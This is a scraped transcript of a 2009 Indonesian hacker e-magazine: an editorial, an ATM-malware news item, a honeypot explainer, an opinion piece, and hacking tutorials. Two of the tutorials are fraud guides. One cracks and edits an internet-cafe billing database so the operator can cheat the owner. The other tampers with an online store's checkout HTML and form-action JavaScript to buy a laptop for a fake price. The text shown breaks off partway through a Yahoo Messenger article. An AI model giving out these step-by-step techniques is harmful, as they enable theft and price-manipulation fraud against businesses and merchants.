Hacking Billing Explorer – Hal 9 Remote
-
Upload
yoni-ahmad -
Category
Documents
-
view
274 -
download
8
Transcript of Hacking Billing Explorer – Hal 9 Remote
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
1/71
ro an UnDetected AV Hal 38
lind SQL Injection Hal 59
acking Billing Explorer Hal 9
emote SQL In ection Hal 26
hpMyAdmin Vulnerablity Hal 47
ddOns Mozilla Made Eas Hal 33
Hackers-Center Indonesia www.hackers-center.org
Seluruh isi yang ada di HC eMagazine adalah sepenuhnya milik penulis, HC h
sebagai media berbagi ilmu dan HC Magazine ini dapat di download deGRATIS dan boleh menyebarluaskan dengan bebas dengan tujuan Non-Profit
http://www.hackers-center.org/http://www.hackers-center.org/http://www.hackers-center.org/http://www.hackers-center.org/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
2/71
- 1- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
HCeMagazineHC eMagazine..?HC eMagazine adalah majalah elektronik komputer, internet, hacking dan coding
berbahasa Indonesia yang dibuat oleh staff dan member HC dengan format PDF.
Latar Belakang HC eMagazine :
Makin banyaknya kebutuhan akan informasi dunia teknologi komputer dan internet
membuat HC menjadikan komunitas baru di dunia internet yang menyediakan bahan
referensi dalam dunia cyber khususnya hacking sehingga para pecinta internet tidak
tertinggal informasi.
Tujuan :
Share and Learning adalah moto HC dengan tujuan semua orang dapat berbagi ilmu
dan belajar dari ilmu yang didapat. Serta memberikan pencerahan terhadap dunia
Teknologi Informasi khususnya Hacking dan Security.
Misi :
Menyebarkan ilmu-ilmu komputer, internet dan hacking untuk tujuan Positif hanya
untuk pengetahuan dan tidak untuk disalahgunakan.
Hak Cipta :
Seluruh isi yang ada di HC eMagazine adalah sepenuhnya milik penulis, HC hanya
sebagai media berbagi ilmu dan HC Magazine ini dapat di download dengan GRATIS
dan boleh menyebarluaskan dengan bebas dengan tujuan Non-Profit.
Distribusi HC Magazine :
- HC Magazine Dapat di download secara resmi diwww.hackers-center.org
- Website staff dan member HC
- Serta media-media pendukung yang bekerjasama dengan HC
Contact HC Magazine :
- Administrator ([email protected])
- ciebal ([email protected])
http://www.hackers-center.org/http://www.hackers-center.org/http://www.hackers-center.org/http://www.hackers-center.org/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
3/71
- 2- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Editorial
Hacking is Not a Crime
Bermula dari diskusi kecil di forum HC dilanjutkan
dengan ide dari kontributor kami pass_word, rasanya
seperti mimpi akhirnya HC eMagazine Vol. 02 ini bisa
kami selesaikan. Disela-sela kesibukan kami di dunia
nyata walaupun dengan sedikit keterlambatan terbit
tapi kami mencoba berusaha untuk tetap
memberikan yang terbaik untuk member serta
pembaca HC eMagazine.
Tujuan dibuatnya majalah elektronik ini bukan semata-mata untuk
mengajarkan orang untuk berbuat kriminal tapi memberikan pencerahan
bahwa segala sesuatu yang di anggap tidak mungkin menjadi sangatmungkin untuk dilakukan oleh hacker. Ilmu pengetahuan yang kami bahas
disini, mungkin bisa berbahaya bagi anda tapi juga sangat berguna bagi anda
untuk menghindari segala macam serangan-serangan berbahaya di dunia
maya yang bisa berdampak pada kehidupan nyata.
Di dalam edisi kedua ini, banyak sekali masalah-masalah yang kami bahas.
Anda bisa melihat tehnik-tehnik para hacker dalam melakukan penelitian
kelemahan situs, mencoba meneliti kelemahan software, bagaimana
membuat sebuah trojan sederhana yang bisa berdampak cukup serius pada
system komputer kita, mengintip password dalam jaringan. Selain yang telah
disebutkan, masih banyak lagi artikel-artikel lainnya yang sangat menarikuntuk diikuti seperti cracking, blind SQL Injection, Networking dan lain
sebagainya.
Akhir kata, saya harapkan majalan elektronik ini bisa digunakan untuk anda
dan tentu saja masih banyak kekurangan yang mesti diperbaiki. Oleh karena
itu kami sangat mengharapkan saran maupun kritik para pembaca dengan
menghubungi saya secara langsung ataupun menghubungi redaksi HC
eMagazine.
Regards,
ciebal
Administrator
NeckLord
UnderDOS
Viper
Nobita HC
Moderator
RamzArminVanBuuren
Equal
Jackzard
Kotaro
Spiderman
ciebal
nicx
Contributor
metropolix
root
agitama
pass_word4L13Ngeneral_nagabonar
HC eMagazine Writer
ciebalCoco_Nk4lTenro
kecoaquCybernet
root
NeckLordeminemomicron9194
Contact
Kirim Artikel
Kritik dan Saran
Download HC eMagazine
www.hackers-center.org forum.hackers-center.orgAll Supported Us
mailto:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]://www.hackers-center.org/http://www.hackers-center.org/http://www.hackers-center.org/http://forum.hackers-center.org/http://forum.hackers-center.org/http://forum.hackers-center.org/http://forum.hackers-center.org/http://www.hackers-center.org/mailto:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
4/71
- 3- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
/Dir Hot News - Waspada! ATM Mulai disusupi Malwarehal.4
Do You Know..? Apa Honeypots itu..?hal.5
Opini Pembaca Tamatkah Dunia Underground Indonesia..?hal.6
Hacking Billing Explorer Hacking Billing Explorer Database All Versionhal.9 IP Forwading Setting IP Publichal.12
Trik Mencurangi Toko Online Trik Mencurangi Toko Onlinehal.15
YM Invisible Checker Cek Status YMhal.24
Remote SQL Injection Exploit SQL Injection pada PHPRecipeBook 2.39hal.26
Add Ons Mozilla Made Easy Cara Mudah dan Cepat Membuat Toolbar Browserhal.33
Trojan UnDetected AV Membuat Trojan Sederhanahal.38
Antena ASTRO Holic Antena ASTRO Holichal.43
PhpMyAdmin Vulnerability Getting Windows Shell with phpMyAdminhal.47
Sniffing Jaringan with Cain & Abel Mengintip Password Orang dalam Jaringanhal.53
Blind Injection Exploit Web with Blind SQL Injectionhal.59 Hack Shortcut Mozilla Menjahili Orang dengan Shortcut Mozillahal.62
Dummy Text MS Word 2007 Karakter Rahasia pada Microsoft Word 2007hal.65
HC eMagazine Writer Ketentuan Menjadi Penulis HC eMagazine
Lampiran Serba-Serbi HC eMagazine
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
5/71
- 4- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Hot NewsBerita Seputar Teknologi Informasi
Present By : Redaksi HC eMagazine
Waspada! ATM Mulai disusupi Malware
Jakarta - Waspadalah jika akan transaksi di ATM. Malware atau
program jahat telah menyusupi ATM. Program itu bisa digunakan
untuk mencuri rekening, serta nomor PIN. Bahkan bisa menguras
habis isi mesin ATM.
Sekitar 20 ATM sudah berhasil dibobol pejahat, kebanyakan berada
di Rusia dan Ukraina. Nicholas Percoco, wakil presiden SpiderLabsdi Trustwave yang menyediakan keamanan data dan pembayaraan
kartu kredit mengungkapkan indikasi awal menunjukkan serangan
serupa telah terjadi berbagai negara termasuk di AS. Program jahat itu kemungkinan besar ditanam oleh orang
dalam, baik pegawai bank, produsen ATM atau perusahaan yang melakukan perawatan mesin ATM. Percoco
mengatakan hal itu karena program jahat itu harus diinstall secara manual.
ATM yang diserang semuanya menggunakan sistem operasi Windows XP dan disamarkan sebagai Windows
protected storage service yang sah. Program jahat itu bisa mencatat semua data yang diproses oleh ATM.
Meskipun PIN disandikan, tapi penjahat bisa menyadap kunci pembukanya dan bisa digunakan untuk membuka
PIN itu. Jika malware sudah berhasil bersembunyi di ATM selama beberapa waktu, penjahat bisa kembali ke
ATM itu dan menggunakan kartu khusus untuk mengambil alih ATM.
Penjahat bisa mencuri rekening, termasuk memerintah ATM untuk mengeluarkan seluruh uang kas nya. "Ada
bukti kartu seperti itu telah digunakan," katanya. Malware pertama kali diketahui telah diinstall di ATM pada
Juli 2007. Meskipun program jahat harus diinstall secara manual ke ATM, tapi pejahat tidak akan berhenti
sampai di situ. Di masa mendatang, program jahat bisa disebar dengan mudah menggunakan jaringan ATM.
Lalu bagaimana melindungi dari kejahatan seperti ini? "Konsumen sebaiknya menghindari ATM yang
kelihatannya tidak beroperasi dengan baik," kata Percoco sambil mencontohkan hal itu bisa dilihat dari layar
yang memiliki interface berbeda atau ada perintah yang aneh.
Penjahat juga bisa menggunakan teknik skimmers dengan memasang perangkat khusus di lubang dimana kartu
ATM dimasukkan. Perangkat ini bisa mencuri data, sementara PIN direkam menggunakan kamera tersembunyi.Sering kali transaksi ATM bisa berlangsung secara normal dan konsumen tidak menyadari rekeningnya telah
diambil alih. Salah satu pelaku skimming ini telah ditangkap. Skimmer ATM Turki bernama Chao menunjukkan
cara perampokan bank dengan cara modern itu bisa dilakukan. Skimming mulai muncul di Afrika Selatan sejak
2004 dan menyebar ke seluruh dunia termasuk AS.
Sumber :www.inilah.com
http://www.inilah.com/http://www.inilah.com/http://www.inilah.com/http://www.inilah.com/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
6/71
- 5- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Do You Know..?Sebaiknya Anda Tau..
Present By : Redaksi HC eMagazine
Apa Honeypots itu..?
Pada dasarnya honeypots adalah suatu alat untuk mendapatkan informasi tentang
penyerang. Selanjutnya administrator jaringan dapat mempelajari aktifitas-aktifitas yang
dapat merugikan dan melihat kecenderungan dari aktifitas tersebut. Honeypots adalah
sebuah sistem yang dirancang untuk diperiksa dan diserang.Ada dua kategori honeypots :
Production honeypot, digunakan untuk mengurangi resiko serangan pada sistem
keamanan jaringan informasi dalam sebuah organisasi.
Reasearch honeypots, digunakan untuk medapatkan informasi sebanyak mungkin tentang penyerang sehingga
seorang administrator dapat mempelajari informasi tersebut.
Beberapa kalangan memperdebatkan apakah benar honeypots menambah nilai pada suatu sistem keamanan
jaringan informasi. Salahsatu cara untuk mencobanya adalah dengan cara melihat dari berapa lama honeypots
memberikan waktu pada administrator untuk bereaksi sejak saat serangan itu masuk, sehingga seorang
administrator dapat melindungi jaringan produktifnya. Jika dalam 15-20 menit, maka honeypots tersebut akan
mempunyai nilai tambah. Informasi penyerang yang sudah dipelajari juga akan memberikan nilai tambah pada
sistem kemanan jaringan, karena sebuah serangan balasan yang tepat akan dapat dibuat untuk pertahanan
terhadap serangan baru tersebut. Honeypots tidak memerlukan suatu penempatan tertentu pada jaringan
karena dia adalah sebuah server standar tanpa kebutuhan khusus. Honeypots dapat ditempatkan dimana saja
seperti sebuah server akan ditempatkan. Tetapi akan lebih baik jika diletakkan pada tempat yang mudah
dijangkau oleh orang orang tertentu. Honeypots dapat digunakan pada internet maupun intranet, Penempatan
honeypots pada intranet dapat berguna untuk mendeteksi seorang penyreang yang berada di jaringan internal.
Jika fokus utama pada internet, honeypots dapat diletakkan pada dua lokasi:
Di depan firewall (internet)
DMZ8
Di belakang firewall (internet)Setiap penempatan mempunyai kelebihan dan kekurangnnya. Kadang tidak
mungkinuntuk sebuah server di depan firewall.
Honeypot yang didistribusikan pada sebuah network (honeynet) dapat membentuk detektor yang akurat
kecuali faktor harga (terutama hardware dan admistration costs) menjadi faktor penghalang
diimplementasikannya honeynet. -Red
Referensi : ID-SIRTII(www.id-sirtii.or.id)
http://www.id-sirtii.or.id/http://www.id-sirtii.or.id/http://www.id-sirtii.or.id/http://www.id-sirtii.or.id/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
7/71
- 6- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Opini PembacaTamatkah Dunia Underground Indonesia..?
Present By : Omicron9194
Sedikit Omicron mengambil kutipan dari idsecconf 2008 kemarin mengenai nasib dunia underground
Indonesia. How ?
Sejenak kita renungkan dunia underground Indonesia.Dunia yang melahirkan para jagoan dunia maya
khususnya di bidang keamanan cyber , sekarang ini dalam kondisi tidak menentu.Keprihatinan ini terjadi di
seluruh belahan dunia yang di perjelas oleh Duvel dengan artikelA brief history of the Underground scene.
Mungkin agak sedikit ekstrim atau mungkin sangat ekstrim dengan judul seperti itu. Tapi inilah
kenyataannya. Dunia Underground Indonesia sekarang ini sedang mengalami degradasi yang cukup serius.
Keprihatinan yang mendalam adalah kemunculan generasi-generasi yang lebih berorientasi kepada materi dan
publikasi dibanding dengan kemurnian berorganisasi,berdiskusi dan berbagi ilmu pengetahuan. Ditandai
dengan semakin sepinya dunia IRC yang merupakan salah satu tempat diskusi dunia maya, serta conference
yang semakin nge-junkjauh dari materi pembelajaran.
Seiring perkembangan waktu,juga timbul regenerasi baru di dunia cyber. Tetapi coba kita lihat
pendatang baru sekarang. Mereka terlalu manja, tidak mau berusaha keras dan gampang menyerah. Sejak
adanya google pada tahun 2003 yang belum ditemukan sebelumnya. Serta banyak lagi tutor-tutor bahasa
Indonesia yang berserakan di dunia maya.
Kemunduran dunia underground juga di perlihatkan dengan adanya aksi pen-deface-an situs dalam
negeri. Akhir-akhir ini kian marak aksi deface negeri sendiri. Tidak tahu motif apa sebenarnya dari aksi deface
tersebut. Yang sangat memalukan sekaligus memilukan adalah mereka yang meninggalkan jejak setelah
beraksi. Inikah dunia underground Indonesia sekarang ?
Mungkin ini lah yang Omicron sampaikan. Regenerasi di dunia cyber sekarang hanyalah berorientasi
kepada materi dan publikasi saja. Ya,tidak lain adalah mereka yang hanya untuk mencari ketenaran belaka.
Akhir-akhir ini sering sekali kita lihat aksi deface, tidak tahu itu teman atau lawan.
Forum Cyberdos.org misalnya, 21 Mei 2009 kemarin forum itu di deface oleh sesama teman dunia
bawah tanah. Apa yang menyebabkan aksi itu ? Ya, jawabannya hanyalah ke-egoisan yang mempunyai ilmu.
http://phrack.org/issues.html?issue=64&id=4#articlehttp://phrack.org/issues.html?issue=64&id=4#articlehttp://phrack.org/issues.html?issue=64&id=4#articlehttp://phrack.org/issues.html?issue=64&id=4#article -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
8/71
- 7- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Mereka merasa dirinya lah yang lebih dari semuanya.Maksud dan tujuannya pun tidak jelas.Mereka hanyalah
seorang kiddies bahkan lebih rendah dari itu!
Inikah salah satu yang menyebabkan kemunduran dunia underground di Indonesia ? Mungkin
iya.Mereka para defacer lupa akan siapa yang telah mengajarinya,yang telah membuat mereka menjadi
begini , lupa bahwa dia dahulu siapa,dan sekarang mereka telah bisa berbuat apa.Mereka seakan kacang lupa
pada kulitnya.
Dunia underground Indonesia sekarang tidak seperti dulu lagi.Seiring perkembangan waktu dan
teknologi telah melahirkan orang-orang penting di dunia cyber.
Haruskah kita juga menjadi kiddies? Ataukah kita mematuhi etika yang ada ?
|omicron9194|
--Specification
A.k.a : omicron9194
Age : NineteenOrigin : Bengkulu, Indonesia
Location : Bandung, Indonesia
http://d1gdo.com
http://omicron9194.nnce.web.id
Interest : Hacking 'n Security
Programming 'n Networking
Algorithm 'n Artificial Intelligence
Work : University Student
Computers : # "Wizz4rd" AMD Sempron 3000 , 512MB, 2 HDD 80 GB + 20GB, with XP Prof Ops Sys
# "Aurencia a.k.a Felt" Asus F3E Core2Duo , 1.5GB , 120GB , with XP Prof ,
Ubuntu Intrepid Ibex Ops Sys
Member of : Echo , NNCE Team! , Hackers-Center
--Favorite
Redaksi HC eMagazine menyediakan halaman khusus untuk opini yang dibuat oleh penulis Setia HC
eMagazine Vol 1 dan 2 yaitu omicron9194 sebagai apresiasi terhadap perkembangan dunia underground
indonesia. Terimakasih atas partisipasinya. Berikut ini adalah Biodata penulis :
http://d1gdo.com/http://d1gdo.com/http://omicron9194.nnce.web.id/http://omicron9194.nnce.web.id/http://omicron9194.nnce.web.id/http://d1gdo.com/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
9/71
- 8- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Food : Sambel buatan Ibu , Lenggang , Bakso , MpekMpek , Lontong , Mie Ayam , Nasi Goreng , Rujak
Drink : H2O , Susu , Es Jeruk
Movies : Action , Imagination
Books : AlQuran , All About Islamic , All About Information of Technology
Game : I'm not Gamer
--Quote
"Hasbunallah wani'mal waqiill..."
--I want to be...
Elite Hacker...
--Shoutz 'n Greetz
# Allah SWT
# Rasulullah SAW 'n My Lovely Family
# |NNCE Staff | : Lintah_Cyber,Cyber*Z_Camel,Romeo,Gembel_cyber,Goblin,TripleZix
# Echo,NNCE Team!,Hackers-Center,All Underground Community
# xpyrcker , ketek , unsuprise , Juniorsev3n , k3m4n9i , vYc0d , ciebal , ch1km0nk , etc ....
# My Friends, I'm nothing without you
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
10/71
- 9- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Hacking Billing ExplorerHacking Billing Explorer Database All Version
Writer : Coco_nk4l([email protected])
Kalian pasti dah gak asing lagi dengan namanya Billing explorer, Billing
yg kebanyakan di gunakan oleh para pemilik warnet, Billing Ini mampu
menyimpan semua hasil transaksi dan semua konfigurasinya di sebuah
file yang berekstensikan *.008 ( 008 file ) nah mungkin gak gw doank yg
punya fikiran file ini sebenernya file apaan c??? ternyata setelah di
obok2 file tersebut adalah File database yg diubah ekstensi aslinya
mnjadi *.008. disini gw bakalan coba kasih tau gimana cara bacanya tapi
jangan punya harapan untuk bisa membaca password Admin dolo
karena gw lom sempat nemuin cara tersebut, Trik ini mungkin sangat berharga buat para Operator warnet yg
menggunakan Billing ini dan ingin melakukan sedikit kecurangan tetapi tidak di beri tau password admin padabilling (Seperti yg di alami Kakak gw). Oke gw kira cukup basa-basi kita .
Yang musti loe lakuin adalah buka lokasi dimana software billing di install contoh : D:\Billing\Billing explorer\
Lihat disana bakal ada file ber ekstensi *.008
Disana loe bakal nemuin file bernama bill01.008 (lihat tanda panah) sebelumnya copy dulu file tersebut untuk
menghindari hal yang gak di inginkan lalu ubah ekstensi dari bill01.008 menjadi bill01.mdb setelah di ubah
ekstensinya coba loe buka file tersebut apakah bisa di buka??
mailto:[email protected]:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
11/71
- 10- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Ternyata File bill01.mdb di lock untuk bisa membukanya, pake Advance Office Password Recovery ( Silahkan
kalian googling ) kalo udah silahkan di crack password dari File bil01.mdb dan yang akan kita dapetin sepert
gambar dibawah ini
Pada gambar diatas terlihat password file ternyata berantakan masih berupa code2 yg aneh, tapi gak usah
takut yg kita butuhin hanya password itu untuk membuka dan mengedit file tersebut jadi copy aja
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
12/71
- 11- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
passwordnya dgan click icon 2 kertas di samping password dan masukan password ketika di minta untuk
memasukan password pada saat kita buka file bill01.mdb, setalh itu coba op en databasedan masuk pada
table2 yang sekiranya ingin kalian ubah,
Setelah selese di edit save kembali dan kembalikan format ke semula menjadi bill01.008 dan gantikan file asli
dengan file hasil editan kita .
Catatan :
Pada saat menggantikan file bill01.008 yg asli dengan file hasil editan kita, pastikan billing server dalam
keadaan non aktif.
Salam
Coco A.K.A Nk4l
Hackers-Center Balikita Yogyafree HD Team| UnderDos | MetroPolix | R00t | Niko A.K.A Biadabz | AK-47| GT-5|
|inc0mp13te | X-shadow | Jeje | Ramz | Agitama | Gorontalo Defacer |
| Indonesian Coder | Cukdu$ Crew | Tuban Hackerlink | Deantique |
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
13/71
- 12- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
IP ForwadingSetting IP Public
Writer : kecoaqu([email protected])
Langsung aje ya
Pengertian IP Publik itu adalah IP yang dikenali di internet. Jumlahnya sangat
terbatas. Kemarin gw mencoba membuka Ip porwading untuk membuka ip public
yang di tutup oleh sebuah providerny, gunanya membuka itu gw maksudkan untuk
supaya IP tersebut dapat diakses dari luar kantor dan juga kebutuhan system gw
juga yang dibuat oleh kantor gw supaya dapat diakses dari luar kantor. Sebenarnya
sangat riskan klo IP itu di buka karena dangan sangat mudah jika seorang Hack
yang tau, walau pun harus menembus beberapa pengaman dulu. (padahal gw juga ga tau caranya gmn, xixixi)
Langsung aje yach disini gw menggunakan Prolink berhubung jebol kena petir jadi gw ganti lagi pake Aztech !!!
1. kalian bisa buka internet lalu masuk ke get way provider yang dipakaidisini gw pakai speedy
http://192.168.1.1. lalu login sesuai dengan yang diberikan oleh bawaan modem, itu juga klo belum
diganti.
2. jika sudah berhasil kalian bisa cari menu Port Forwading
mailto:[email protected]:[email protected]:[email protected]://192.168.1.1/http://192.168.1.1/http://192.168.1.1/mailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
14/71
- 13- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
3. Jika sudah terbuka menu Port Forwading. Kalian pilih Category User tambahkan New rules sesuai
kebutuhan kalian disini kebutuhan saya untuk SQL server lalu di Add.
Lalu pastikan LAN IP sudah dipastikan hanya computer itu yang bisa diakses oleh kita nantinya
biasanya itu sebuah server.
Belum sampai disitu kalian juga harus setting bagian Custom Port Forwading.
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
15/71
- 14- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Dimenu ini ada setting sesuai IP Compie yang ingin di akses dan juga PORT berapa yang ingin dibuka. Klo
gw memakai SQL SERVER 2000 tetepi harus di Upgrade dulu menjadi SP4 karna PORT yang gw pakai tidak
support dengan SQL SERVER 2000 standrat. Klo sudah selesai lalu submit.
4. jika sudah selesai Save Setting lalu Resset & Rebot. Klo mau tes berhasil atau tidak bisa di tes Di
alamatHttp://canyouseeme.com
Gampang kan ( padahal mumet banget gw settingnya ) apalagi ga semua modem yang support dengan Port
Forwading....
gw berhasil juga karena hasil sharing dengan Under-Dos, Password sama Root!!!
Sory klo ga begitu jelas menjelaskannya dan masih banyak kesalahan-kesalahan.
Thanks
Kecoaqu / Arul
http://canyouseeme.com/http://canyouseeme.com/http://canyouseeme.com/http://canyouseeme.com/ -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
16/71
- 15- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Trik Mencurangi Toko OnlineTrik Mencurangi Toko Online
Writer : Tenro
Pertama-tama gw makasih banget sama momod, contributor dll HC yang udah mau
nerbitin artikel pertama w, he...he..;-).Muph sebelumnya kalo artikel gw cupu, artikel ini
gw bikin atas dasar kemampuan ekonomi keluarga gw yang belum bersedia ngebeliin gw
laptop hiks...hiks ;-(. Semoga setelah gw bikin artikel ni ada donatur yang bersedia
ngebeliin w laptop he..he..he... (ngarep).
Segitu ajah basa-basinya nti malah jadi basi lagi. Gw mau share ma kalian tentang trik cara mencurangi
toko online dengan merubah harganya, kalini kita gag perlu nyari-nyari tuch kutu di web yang jelas-jelas itu
akan makan waktu n ribet (menurut gw) n yang lum bisa carding (kaya gw) ni alternatif laen, tapi pengetik tidak
bertanggung jawab yah... JUST 4 LEARN.
Mari kita mulai operasinya....
Preparation:
1. kompi pastinya (kalo bisa n di anjurkan bisa akses inet jadi gag ribet)
2. notepad or frontpage (sekedar saran mending make frontpage)
3. lagu-lagunya kungpow (WAJIB)4. cemilan (di anjurkan beli keripik singkong)
dah segitu aja persiapan nya, sedikit kan.....
oh iya lupa sebelom mulai pastikan anda ke kamar kecil dulu biar gag ribet nantinya.....
Mulai triknya....
1. kita cari target kita di tong sampah kalo gag ketemu kita tanya google. Karena w lagi pengen laptop maka
keyword w laptop.... Wew w dapet banyak bgt, tapi w Cuma milih satu ajah yaitu:
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
17/71
- 16- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Yah ketauan w sering buka FB he...he...he...
2. kalo udah nemu, kita amati web itu dolo.
Q: apa yang di amati????
A: pertanyaan bagus, yang kita amati bagaimana cara kita order laptop itu.
Udah belom??? Jangan lama-lama...
3. kalo udah mari kita cari mana yang mw kita order,
trus kita pura-pura order barangnya,
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
18/71
- 17- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
pas di checkout ternyata dia minta kita harus jadi member n ngasih data-data kita.
wah gawat..., untung punya banyak koleksi e-mail+no Hp+alamat jadi selamat. So ikuti aja maunya.....
4. mulai dari sini w saranin kalian make kaca mata deh or cuci muka cos bakal pegel bgt (kalo yang belum
terbiasa kaya w). Kita ambil source code-nya saat kita udah login soalnya kalo belom login kita akan semakin
ribet. Trus save dengan ekstensi *.html. w ngambil source codenya pas disini
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
19/71
- 18- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
5. nah abis itu kita jalanin source code itu dari HD kita. Saran mending make frontpage biar keliatan
visualisasinya (bagi yang belum terbiasa liat coding). Tapi karena w gag punya n males download w make
notpad ajah. Kita amati codenya+terjemah kan n w dapet hal yang keren
Netbook Asus Eee PC 1000HE
Rp
7,740,000.00
Rp
7,740,000.00
Total Rupiah:7,740,000.00
Kode di atas merupakan data dari barang yang kita order
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
20/71
- 19- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Ket: Pink: nama barang yang kita order, Merah: harganya
Kode di atas adalah perintah untuk memanggil script
Ket: Biru: kata-kata yang ada di kotak, Hijau: script yang di panggil ketika kita mengklik kata-kata warna biru
Nah itu kode yang paling penting, sekarang tinggal edit ajah, edit yang warna merah dengan harga yang anda
inginkan, tapi masih ada masalah kalo kita klik check out kok malah error, kenapa hayo????
INGAT kalo kita ngeklik tulisan warna biru tanpa sadar kita memanggil tulisan warna Hijau, jadi kita juga harus
ngedit yang Hijau cara ngeditnya kita cari javascriptnya gobayar. Setelah dicari akhirnya dapet
function gobayar()
{ document.f1.action = "shoppingcartout.php";
document.f1.submit();
itu dia codingnya. Sekarang di apain???
Sekarang ganti tulisan yang warnanya orange. Ganti make apa???? Emang itulisan itu artinya apa???
Tulisan itu artinya, kalo kita klik tulisan yang warnanya biru tadi maka kita akan pergi ke halaman itu, nah
gantinya kita harus ganti jadi http://target.com/page yang dituju selanjutnya.php (itu di ambil dari URL kalo
kita ngeklik check out)
http://target.com/page%20yang%20dituju%20selanjutnya.phphttp://target.com/page%20yang%20dituju%20selanjutnya.phphttp://target.com/page%20yang%20dituju%20selanjutnya.php -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
21/71
- 20- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
6. Kalo udah di edit semua jadinya begini codingnya
function gobayar()
{ document.f1.action = "http://target.com/shipping.php";
document.f1.submit();
}
Keranjang Belanja
No
Item
Qty
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
22/71
- 21- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Price
Subtotal
1
Netbook Asus Eee PC S101H
Rp
1,000.00
Rp
1,000.00
Total Rupiah:1,000.00
7. lalu save pekarjaan anda trus tinggal di jalankan lagi pada HD anda Maka jadinya akan begini
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
23/71
- 22- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Liat yang di lingkarin harganya udah sesuai dengan yang kita inginkankan????
Trus pas kita klik check out maka tulisan itu akan membawa kita pergi ke web yang sesungguhnya.....
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
24/71
- 23- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Selesai dah....
Gimana gampang kan????
Kalo ada pertanyaan kita bahas di forum okeh....
Sikian dulu ah, ngantuk....
/nick: Tenro
/lokasi: dari UKI naek 56 turun di cileungsi nah dari situ telpon eightTailz ajah minta di anterin ke rumah w.
/YM: Rizal hakuya
/web: tinggal nyewa domain doang
/avatar: i dont have avatar (entah mengapa w gag bisa make avatar)
Thx to:-ALLAH SWT yg udah ngasih w kesempatan buat hidup
-My parents yg udah berjasa bgt bagi w
-Ade w Alif yang ngajarin w coding n maen kompi
-My lovely Azizah yang selalu nyemangatin w
-EightTailz yang udah menjerumus kan w ke dunia Hacking
-Sto thx 4 ur artikel
-All undergruond forum
-My [email protected](tapi lagi fakum sebagian besar membernya lagi ngerjain
PLO, semangat guys)
-My friends phantom aka toke aka Chaer newbie, em32, R 324 fm, Iis aka Via, om Galih, Om kiwil, Om
dwi n all yang gag bisa w sebutin satu-satu
- -My comp Intel celeron, HDD 20GB, RAM DDR1 128+256, Mobo Asus, OS win7 (jangan ditiru orang
bodoh ini)
-Warnet yang selalu w jahilin muph gag sengaja bis BT w
mailto:[email protected]:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
25/71
- 24- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
YM Invisible CheckerCek Status YM
Writer : Cybernet([email protected] )
Ym adalah sarana chating
yang mendunia zaman
sekarang ini . Di app Ym kita
bisa Chat,Kirim File Terima
File,Berwebcam ria,Sharing
sesame umat. hehehehe
.dll .
Kadang kadang sebagian ID teman di Ym kita
mengganti status dengan Invies sehingga kita tidak
bisa melihat dia oL or ga.jadi bijimana kita bisa liat
dia Online tapi invies atau bener ga Online??
Tenang ada Cara mudah untuk memecahkannya
.hehehe ..
Gambar diatas adalah status pada Ym dan juga kita
bisa buat sendiri.pasti udah pada taukan apa maksud
gambar di atas.hehehe . . .
Nah ada status yg sangat mengesalkan.hehe .
Invisible to Everyonemenunjukan seseorang sedang
Online tetapi tidak terlihat Online oleh kita . Status
Invisible hampir sama dengan status Offline. Hanya
bedanya invisible itu user online
tapi tidak kelihatan, sedang Online memang sedang
